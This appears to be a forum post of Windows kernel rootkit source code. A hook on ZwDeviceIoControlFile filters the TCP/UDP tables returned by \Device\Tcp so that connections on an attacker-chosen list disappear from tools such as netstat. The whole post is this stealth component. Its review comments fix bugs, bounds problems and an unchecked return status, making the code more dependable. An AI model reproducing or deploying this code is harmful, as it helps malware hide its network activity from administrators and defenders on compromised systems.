port/connection hiding


By: akcom

/*
 * Overlay used by NewZwDeviceIoControlFile to read one row of the table the
 * TDI query returns in OutputBuffer.  The hook walks that buffer with a stride
 * of sizeof(MIB_TCPROW) for TCP and sizeof(MIB_UDPROW) for UDP (plus 4 bytes
 * when the "extended" variant is requested), so:
 *
 *   - on a TCP row all five ULONGs are valid and line up with MIB_TCPROW
 *     (state, local addr, local port, remote addr, remote port);
 *   - on a UDP row only entry1/entry2 are valid (local addr, local port) —
 *     the row is just sizeof(MIB_UDPROW) bytes, so entry3..entry5 must NOT be
 *     read on UDP rows;
 *   - an "extended" row carries 4 extra trailing bytes that this struct does
 *     not cover (the hook only steps over them).
 *
 * Ports are used as (USHORT)entryN by the caller; byte order is whatever the
 * stack returns — not normalised here.
 */
typedef struct _GENERIC_RECORD
{
ULONG entry1; //state on tcp, local addr on udp
ULONG entry2; //local addr on tcp, local port on udp
ULONG entry3; //local port on tcp  (absent on udp rows)
ULONG entry4; //remote addr on tcp (absent on udp rows)
ULONG entry5; //remote port on tcp (absent on udp rows)
} GENERIC_RECORD, *PGENERIC_RECORD;

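/*
 * Case-insensitive ASCII comparison of a UNICODE_STRING against an ASCII
 * literal.  A UNICODE_STRING is NOT guaranteed to be NUL-terminated and its
 * Length is in bytes, so the compare is bounded by Length rather than by a
 * terminator.  Returns true only on an exact, full-length match; any wide
 * character outside 7-bit ASCII can never equal the literal and simply fails
 * the compare (nothing is folded or truncated).
 */
static bool objectNameEquals(POBJECT_NAME_INFORMATION info, const char *expected)
{
    ULONG chars;
    ULONG i;

    if (info == NULL || info->Name.Buffer == NULL)
    {
        return false;
    }

    chars = info->Name.Length / sizeof(info->Name.Buffer[0]);

    for (i = 0; i < chars; i++)
    {
        unsigned int have = (unsigned int)info->Name.Buffer[i];
        unsigned int want = (unsigned char)expected[i];

        if (want == 0)
        {
            return false; /* object name is longer than the literal */
        }
        if (have >= 'A' && have <= 'Z')
        {
            have += 'a' - 'A';
        }
        if (want >= 'A' && want <= 'Z')
        {
            want += 'a' - 'A';
        }
        if (have != want)
        {
            return false;
        }
    }

    /* equal prefix: a match only if the literal ends here as well */
    return expected[chars] == '\0';
}

/*
 * Hook for ZwDeviceIoControlFile (installed elsewhere; OldZwDeviceIoControlFile
 * holds the original entry).
 *
 * The real call is always made first with the caller's arguments untouched.
 * Only when it completed successfully, the control code is 0x120003
 * (presumably IOCTL_TCP_QUERY_INFORMATION_EX — confirm against the file's
 * headers) and FileHandle refers to \Device\Tcp, the returned TCP/UDP table in
 * OutputBuffer is walked and every row whose local (and, for TCP, remote)
 * address/port matches g_ConList is removed with hideEndPoint();
 * IoStatusBlock->Information is shrunk accordingly so the caller sees a
 * shorter table.  Everything else is passed through unfiltered.
 *
 * Parameters: exactly those of ZwDeviceIoControlFile, forwarded verbatim.
 * Returns:    the status of the original call, in every path.
 *
 * NOTE(review): when reached from a user-mode caller, IoStatusBlock,
 * InputBuffer and OutputBuffer are user-mode pointers.  They are dereferenced
 * directly here, as in the original; a production driver would probe them and
 * wrap the accesses in SEH.  Not added because the hook's installation context
 * is not shown on this page.
 */
NTSTATUS
NTAPI
NewZwDeviceIoControlFile(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG IoControlCode,
    IN PVOID InputBuffer OPTIONAL,
    IN ULONG InputBufferLength,
    OUT PVOID OutputBuffer OPTIONAL,
    IN ULONG OutputBufferLength
    )
{
    NTSTATUS ntRes = ((ZWDICF)OldZwDeviceIoControlFile)(
        FileHandle,
        Event,
        ApcRoutine,
        ApcContext,
        IoStatusBlock,
        IoControlCode,
        InputBuffer,
        InputBufferLength,
        OutputBuffer,
        OutputBufferLength
        );

    /* Nothing to filter unless the real call produced a table. */
    if (!NT_SUCCESS(ntRes))
    {
        return ntRes;
    }

    /*
     * STATUS_PENDING passes NT_SUCCESS() but means the I/O has not completed:
     * IoStatusBlock->Information and OutputBuffer are not valid yet.  The
     * original read them regardless.  An in-flight request cannot be filtered
     * from here (that would need a completion wait or APC), so it is left
     * untouched — an asynchronous caller sees the unfiltered table.
     */
    if (ntRes == STATUS_PENDING)
    {
        return ntRes;
    }

    if (IoControlCode != 0x120003)
    {
        return ntRes;
    }

    /* Both buffers are OPTIONAL in the syscall contract; bail rather than deref NULL. */
    if (IoStatusBlock == NULL || InputBuffer == NULL || OutputBuffer == NULL)
    {
        return ntRes;
    }

    /* Only \Device\Tcp is filtered; any other device gets the unfiltered result. */
    char ObjectNameBuf[512];
    POBJECT_NAME_INFORMATION ObjectName = (POBJECT_NAME_INFORMATION)ObjectNameBuf;
    ULONG ReturnLen = 0;

    /*
     * The original ignored this status: on failure Name.Buffer is garbage and
     * was still handed to wcstombs().  (ObjectNameInfo is presumably this
     * file's name for the ObjectNameInformation class.)
     */
    if (!NT_SUCCESS(ZwQueryObject(FileHandle, ObjectNameInfo, ObjectName,
                                  sizeof(ObjectNameBuf), &ReturnLen)))
    {
        return ntRes;
    }

    /*
     * Original bug: '\\Device\\Tcp' in single quotes is a multi-character
     * integer constant, not a string, so stricmp() received an int as a
     * pointer.  The UNICODE_STRING is now compared by its Length instead of
     * being converted with wcstombs(), which relied on a NUL terminator the
     * string need not have and did not itself terminate the destination.
     */
    if (!objectNameEquals(ObjectName, "\\Device\\Tcp"))
    {
        return ntRes;
    }

    /* The request header is inspected at bytes 0 and 16. */
    PBYTE input = (PBYTE)InputBuffer;
    if (InputBufferLength < 17)
    {
        return ntRes;
    }

    /*
     * Row stride depends on the protocol and on whether the "extended" variant
     * (+4 bytes per row) was requested.  TCP vs UDP is keyed off input[0] as in
     * the original — presumably the low byte of the TDI entity id; confirm
     * against the TDIObjectID layout.  On TCP rows the first ULONG is the
     * connection state and is skipped by the field selection below.
     */
    bool tcp = (input[0] == 0x00);
    ULONG recordSize = tcp ? sizeof(MIB_TCPROW) : sizeof(MIB_UDPROW);
    if (input[16] == 0x02)
    {
        recordSize += 4; /* extended row */
    }

    /*
     * Bound the walk by the buffer the caller actually supplied.  The original
     * divided IoStatusBlock->Information alone, so an inconsistent length
     * would have been walked past the end of OutputBuffer.
     */
    ULONG entryCount = (ULONG)(IoStatusBlock->Information / recordSize);
    ULONG maxCount = OutputBufferLength / recordSize;
    if (entryCount > maxCount)
    {
        entryCount = maxCount;
    }

    PGENERIC_RECORD data = (PGENERIC_RECORD)OutputBuffer;
    ULONG i = 0;

    while (i < entryCount)
    {
        /* UDP rows hold only entry1/entry2; never read beyond them on UDP. */
        ULONG localIp = tcp ? data->entry2 : data->entry1;
        USHORT localPort = (USHORT)(tcp ? data->entry3 : data->entry2);

        /* g_ConList: the author's linked list of endpoints to hide. */
        bool hide = matchesConMask(localIp, localPort, g_ConList) ? true : false;

        /* TCP rows also carry the peer; hide on a remote match as well. */
        if (!hide && tcp)
        {
            hide = matchesConMask(data->entry4, (USHORT)data->entry5, g_ConList) ? true : false;
        }

        if (hide)
        {
            /*
             * hideEndPoint() presumably shifts the following rows down over
             * row i (the original did not advance past it either), so the
             * next row to examine is again at index i.  Shrink the byte count
             * the caller will read from the status block.
             */
            hideEndPoint((PGENERIC_RECORD)OutputBuffer, entryCount, i, recordSize);
            IoStatusBlock->Information -= recordSize;
            entryCount--;
        }
        else
        {
            data = (PGENERIC_RECORD)(((char *)data) + recordSize);
            i++;
        }
    }

    return ntRes;
}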

 
 
 